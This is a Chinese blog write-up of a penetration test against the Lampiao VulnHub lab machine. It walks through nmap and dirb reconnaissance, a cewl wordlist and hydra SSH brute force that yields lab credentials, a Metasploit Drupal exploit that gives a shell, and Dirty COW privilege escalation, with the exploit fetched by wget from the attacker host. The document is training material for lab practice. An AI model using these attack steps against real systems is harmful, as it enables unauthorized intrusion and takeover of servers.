【Lampiao靶场渗透】

已于 2024-08-05 15:18:58 修改
阅读量364 收藏 3
点赞数 3
分类专栏: 靶场渗透 文章标签: 网络安全 web安全 靶场渗透 vulnhub
于 2024-07-30 10:36:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/140790008
版权

一、IP地址获取

netdiscover -i eth0 
Arp-scan -l 
Nmap -sP 192.168.78.0/24

靶机地址:192.168.78.177

Kali地址:192.168.78.128

二、信息收集

nmap  -sV  -p-  192.168.78.177

开放了 22 80 1898端口,访问80 web页面

访问1898端口

发现了登录框和网站框架信息drupal 7,随便点击一下页面发现还存在其他页面内容

http://192.168.78.177:1898/?q=node/2

提示了一个音频和图片文件

http://192.168.78.177:1898/audio.m4a
http://192.168.78.177:1898/qrc.png

音频得到提示user:tiago,图片二维码提示尝试爆破

再利用dirb探测一下其他目录

Dirb http://192.168.78.177:1898

看到了robots文件,访问一下

其中changelog.txt文件可看到框架版本Drupal 7.54

三、破解SSH密码

前面提示说需要爆破,猜测是需要构造密码字典爆破ssh密码

cewl http://192.168.78.177:1898/?q=node/1 -w password.txt
hydra -l tiago -P password.txt 192.168.78.177 -s 22 ssh

最终得到账户密码:

用户: tiago

密码: Virgulino

ssh登录一下

发现是低权限用户!需要提权!

四、漏洞利用

通过前面我们知道网站框架是drupal 7.54,搜索exploite

searchsploit  drupal 7.54

发现msf中有,进入msf进行利用

msfdb init & msfconsole
search  Drupal
Use 1
set rport 1898
set rhosts 192.168.78.177
Set rport 6666
meterpreter > shell

交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

还是低权限用户,还需要考虑提权

五、提权

Uname -a 查看内核版本

Ubuntu 14.01,查阅资料可知可用脏牛漏洞提权

找到相关版本的exp

searchsploit dirty

locate linux/local/40847.cpp 查看绝对路径

将它复制到当前目录,并创建http服务,再靶机/tmp目录下使用wget下载

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root
python3 -m http.server 8000
wget http://192.168.78.128:8000/40847.cpp

编译运行脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o yc  gcc生成的目标文件,名字为yc
./yc  执行gcc编译可执行文件,可直接提权

su命令转到root身份,输入上面的密码:dirtyCowFun,即可提权成功

一纸-荒芜
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Lampiao靶场渗透流程
m0_53933413的博客
10-21 1035
use 4 使用可使用的载荷(tips:查询cms的时候,可以看到最新日期,所以选用最新日期之后的payload)查看是否有可以利用的东西,这里查到一个/CHANGELOG.txt进行访问。拿到更新日志,知道了CMS 具体版本号,及最后的更新日期。查看到80端口 访问成功-尝试目录扫描-扫描不到。我这里搜到一个-远程代码执行漏洞-尝试利用-失败。查看文件的权限 ls -al 发现没有执行权限。查看文件权限,没有执行权的话,进行赋权操作。搜索该CMS是否存在漏洞,并进行利用,
Lampiao靶场渗透
weixin_65582330的博客
06-05 312
这时候我们可以用得到的密码字典去拿hydra九头蛇进行ssh端口爆破,hydra -l tiago -P password.txt 192.168.101.133 ssh(“l”是用指定的用户名,“L”是用用户名字典,p和P同理),可以看到爆破成功,账号为tiago,密码为Virgulino。1.内核提权---脏牛提权最为典型 ,内核提权一般包括3个步骤,信息收集发现版本号,找到相关版本的exp,使用找到的exp对目标发起攻击,完成提权功能。pty.spawn("/bin/bash")'获取到真终端。
lampiao靶机渗透测试
m0_56375711的博客
12-25 1549
lampiao靶机渗透测试。包括awvs、msf、脏牛漏洞提权的练习
lampiao靶场---脏牛提权
m0_66908617的博客
05-11 438
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
零基础渗透测试全程记录(打靶)——Lampiao
ran的博客
07-28 1873
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。在上面扫描出的ip地址中,.1、.2、.254、.138都是其它的一些ip地址,所以在此确认要进行攻击的靶机的ip地址为:192.168.190.140。比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。
靶场练习之Lampiao
qq_52360932的博客
02-28 6008
Lampiao靶场练习
渗透LAMPIÃO: 1靶场
weixin_51421083的博客
06-30 494
这里有一些描述,可以阅读一下,简单了解一下这个靶场的信息:下载完成后会得到如下图的压缩文件,解压文件。
Vulnhub靶场渗透-Lampiao
paidx0
09-20 844
前言 靶机ip(192.168.110.132) 攻击机(192.168.110.127) 网络NAT模式 下面开始 信息收集 同样先扫端口和目录看看 目录扫到的比较多,就挨个打开看了看下,因为没啥经验找关键信息的能力很弱,在一堆网页里看了半天 注意到/CHANGELOG.txt这是个更新日志,更新到Drupal 7.54 版本 在网上大概收集了一下 Drupal这个版本存在哪些历史漏洞,cve-2018-7600正好可以被利用 影响版本 Drupal 6.x Drupal 7.x Drupal 8
手把手教会你--渗透实战--三十个项目--项目二:Lampiao
m0_74317362的博客
11-28 1100
请务必跟着博主复现一遍渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法 . 1. 如何打靶渗透测试步骤: 1. 确定目标 2. 信息收集 3. 发理漏洞 4. 漏洞利用 5. 权限提升 1. 确定目标:在所有的靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对于我们现在这几十个场而言。
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
web渗透测试靶机(新手)
05-07
"626包厢"可能是一个虚拟机或靶场环境的名字,其中包含了多个Web应用程序,用于实践SQL注入、跨站脚本(XSS)、文件包含、命令注入等常见的渗透测试技术。这个环境可以帮助新手了解如何利用这些漏洞,并学习如何防止...
DVWA靶场 渗透学习专用
09-07
【DVWA靶场 渗透学习专用】 DVWA(Damn Vulnerable Web Application)是一个非常流行的在线安全学习平台,专门设计用于网络安全专业人士进行渗透测试和Web应用安全的学习。这个靶场包含了各种常见Web应用漏洞,如...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8367
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 540
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
网络安全】探索AI 聊天机器人工作流程实现RCE
最新发布
等风来
08-06 113
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
深度剖析网络安全挑战与应对策略
执笔写JAVA
08-03 799
“微软蓝屏”事件是由一次微软视窗系统软件更新引发的全球性网络安全事件,导致近850万台设备遭遇故障,波及多个关键行业,造成重大影响。本文从软件更新流程的风险管理和质量控制、预防大规模故障的最佳方案与应急响应对策,以及跨领域连锁反应的行业影响与应对三个方向,深入剖析了该事件所暴露的网络安全问题。文章指出,该事件凸显了软件更新流程中风险管理、质量控制、应急响应机制的不足,以及跨领域合作的重要性。为应对类似挑战,文章提出了加强风险管理、质量控制、应急响应和跨领域合作等全面应对策略。
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值